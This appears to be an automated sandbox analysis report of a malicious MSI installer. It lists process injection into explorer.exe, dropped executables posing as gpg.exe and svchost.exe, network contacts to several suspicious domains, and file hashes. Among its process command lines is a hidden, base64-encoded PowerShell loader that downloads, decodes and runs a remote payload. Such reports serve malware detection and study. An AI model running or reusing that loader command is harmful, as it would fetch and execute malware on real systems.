| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4644 set thread context of 2360 | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIA87B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C35.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8DFC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8E99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5786b4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF8052F16E79F1A722.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5786b8.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF0C7C39F01A3AA06F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF61814C6C9DBA5244.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5786b4.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8AFB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8C15.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF829D7DB7C59C582F.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{40687992-D47D-43B1-8A2C-57D30E7D9D88} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8760.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3F99D94B248A7DE3803C63D3E3377CF1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8F9F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYwB1AHIAbABoAHUAYgAuAG0AbwBuAHMAdABlAHIALwBuAGUAdwBkAHIAbwBwAC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA
C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2360 -ip 2360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2360 -ip 2360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2360 -ip 2360
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 2236
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | thecurl.monster | udp |
| US | 172.67.176.123:80 | thecurl.monster | tcp |
| US | 172.67.176.123:443 | thecurl.monster | tcp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | curlhub.monster | udp |
| US | 172.67.204.219:443 | curlhub.monster | tcp |
| US | 8.8.8.8:53 | 219.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 172.67.195.205:80 | raur94.com | tcp |
| US | 172.67.195.205:443 | raur94.com | tcp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
| US | 8.8.8.8:53 | 35.206.58.216.in-addr.arpa | udp |
Files
C:\Windows\Installer\MSI8760.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSI8E99.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
memory/2528-28-0x0000000002A40000-0x0000000002A76000-memory.dmp
memory/2528-29-0x00000000736B0000-0x0000000073E61000-memory.dmp
memory/2528-31-0x0000000002AE0000-0x0000000002AF0000-memory.dmp
memory/2528-30-0x0000000002AE0000-0x0000000002AF0000-memory.dmp
memory/2528-32-0x0000000005130000-0x000000000575A000-memory.dmp
memory/2528-33-0x00000000057B0000-0x00000000057D2000-memory.dmp
memory/2528-34-0x0000000005950000-0x00000000059B6000-memory.dmp
memory/2528-35-0x00000000059C0000-0x0000000005A26000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jdfd43f3.cmu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2528-44-0x0000000005B20000-0x0000000005E77000-memory.dmp
memory/2528-45-0x0000000005F20000-0x0000000005F3E000-memory.dmp
memory/2528-46-0x0000000005F60000-0x0000000005FAC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pss8FA0.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/2528-48-0x0000000002AE0000-0x0000000002AF0000-memory.dmp
memory/2528-49-0x0000000007690000-0x0000000007D0A000-memory.dmp
memory/2528-50-0x0000000006490000-0x00000000064AA000-memory.dmp
memory/2528-51-0x0000000007210000-0x00000000072A6000-memory.dmp
memory/2528-52-0x0000000006520000-0x0000000006542000-memory.dmp
memory/2528-53-0x00000000082C0000-0x0000000008866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scr8F9E.ps1
| MD5 | 753240f3d0c58563dcba1244db69b0d7 |
| SHA1 | 4a0f248fccc2431ece50f717cbf80f6681504932 |
| SHA256 | e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a |
| SHA512 | 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9 |
memory/2528-55-0x0000000007EE0000-0x00000000080A2000-memory.dmp
memory/2528-56-0x0000000008DA0000-0x00000000092CC000-memory.dmp
memory/2528-60-0x00000000736B0000-0x0000000073E61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msi8F9D.txt
| MD5 | eb0046beb949b23b97dccd59c4b8f131 |
| SHA1 | c084a9c15a323cd51d24122681a494e52577487f |
| SHA256 | b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467 |
| SHA512 | 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0 |
C:\Config.Msi\e5786b7.rbs
| MD5 | 31b2be250bc4c946918c24bca8f8aa92 |
| SHA1 | 82ca9c2f47b796497cb7aa67021a7d7cf3c80a15 |
| SHA256 | 307ebb2baaee3f92b260173205ecd3c78f141c9ea0a7196c60ea5deb01768462 |
| SHA512 | 2ed84f9fc823d97311cd0b5f58a710c2ca81d31d414c871fce3440b0b658df9a939256f1bd7560af306ba43ea50254a7374795ed6e229ebbb61050493ad84eef |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe
| MD5 | 35365d3713500bde4e2e1422c54f04fa |
| SHA1 | 0b24b1de060caa7be51404d82da5fef05958a1da |
| SHA256 | 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19 |
| SHA512 | 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375 |
C:\Windows\Installer\e5786b4.msi
| MD5 | 86a68878633d570e195609fe33640561 |
| SHA1 | 5a5355a80750693493c4ff9d4184d3234ad62b73 |
| SHA256 | 7a5d8ef1b6de2d300a6a3118426562e881577c85ab2d919f0337e4de0e9aaa92 |
| SHA512 | 502f996aff0273aecd4256bd25b3bcd2187a2b44c1b26c0b64a622ae2d788328d8f8e9bbd8fa9119a0edb282d1737f8f502ecf69484a70b14fd287442630c1a9 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll
| MD5 | f74e6b15bbb4d3a8decb9fe17175d056 |
| SHA1 | 20a67c7d020bce3adcbd34cb0044771ae0bcb2ba |
| SHA256 | 50235ec9328d759d9adceb1224999bcf5d602594b2c6260c4f793b84c533e6d3 |
| SHA512 | 5c896a916537cbf6e4f6c995a240b3e651356e5a5fc549058cc60892c5905e64a3fd78cf0998149ca88f474f9ce78c94ea398bd245735a1b242f497adb44bbf4 |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll
| MD5 | a2dd12a8ecef27ca0e524e9bb4bdb8f5 |
| SHA1 | a4f5718c8bc1cc1fba49332d767ad296f7156dbc |
| SHA256 | e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada |
| SHA512 | b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll
| MD5 | b7b148054a2818699d93f96139b4d0d0 |
| SHA1 | 0a5187b37bd84c19a7d2d84f328fa0adbc75123c |
| SHA256 | 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915 |
| SHA512 | 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1 |
memory/4644-155-0x00000000008B0000-0x00000000008B1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll
| MD5 | 8f4cdaed2399204619310cd76fd11056 |
| SHA1 | 0f06ef5acde4f1e99a12cfc8489c1163dba910d1 |
| SHA256 | df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213 |
| SHA512 | 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc |
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll
| MD5 | 0381964390751461a5d79d26ca7cedaa |
| SHA1 | 3b17b9dca5060f9b22920737165a6bd1de5e8941 |
| SHA256 | 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da |
| SHA512 | 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05 |
memory/4644-157-0x0000000001050000-0x0000000001075000-memory.dmp
memory/2360-159-0x00000000005C0000-0x00000000005E8000-memory.dmp
memory/2360-160-0x00000000005C0000-0x00000000005E8000-memory.dmp
memory/4644-162-0x0000000000400000-0x000000000054C000-memory.dmp
memory/4644-163-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/2360-161-0x00000000005C0000-0x00000000005E8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll
| MD5 | 72498f59c8c580707a0a3839c332f51b |
| SHA1 | fb09b912912610d243066cc8b71435f689e6a449 |
| SHA256 | 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d |
| SHA512 | 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022 |
memory/4644-164-0x0000000066580000-0x00000000666AA000-memory.dmp
memory/4644-166-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/2360-165-0x00000000005C0000-0x00000000005E8000-memory.dmp
memory/4644-167-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/4644-168-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4656-175-0x00007FF8231E0000-0x00007FF823CA2000-memory.dmp
memory/4656-182-0x000001FE75510000-0x000001FE75520000-memory.dmp
memory/4656-181-0x000001FE75510000-0x000001FE75520000-memory.dmp
memory/4656-183-0x000001FE74E50000-0x000001FE74E72000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f2460fed3060a114d76eb39c96163832 |
| SHA1 | 0d94b2e590f03bd1dacd12d539288d5ba578db6a |
| SHA256 | 7562977b161dd9dc5d6bb23fc57358af12b7c7c0f435b648fe0befa1699253eb |
| SHA512 | a97039de7444650ba177b93c84a47a418aa5c0b7387ba3bdf2203563556b41d951e7393c965cc012e0b7e11c048c0671c6f366bd8fef1cd0cdf390d0ea44af24 |
memory/4656-188-0x000001FE75510000-0x000001FE75520000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8hmxGifLP41ri2I\svchost.exe
| MD5 | a9c5924063a253f64fb86bc924be6996 |
| SHA1 | c39ba1e011318b3edf295d4bdde3d56b5de89972 |
| SHA256 | eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4 |
| SHA512 | 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e |
memory/2360-223-0x00000000036C0000-0x00000000037C0000-memory.dmp
memory/2360-224-0x0000000003960000-0x00000000039E8000-memory.dmp
memory/4656-226-0x000001FE759B0000-0x000001FE759CC000-memory.dmp
memory/4656-251-0x000001FE75BA0000-0x000001FE75D62000-memory.dmp
memory/4656-252-0x000001FE762A0000-0x000001FE767C8000-memory.dmp
memory/4656-258-0x00007FF8231E0000-0x00007FF823CA2000-memory.dmp
memory/2360-259-0x0000000004B00000-0x0000000004F00000-memory.dmp
memory/2360-260-0x00000000005C0000-0x00000000005E8000-memory.dmp
memory/2360-262-0x0000000004B00000-0x0000000004F00000-memory.dmp
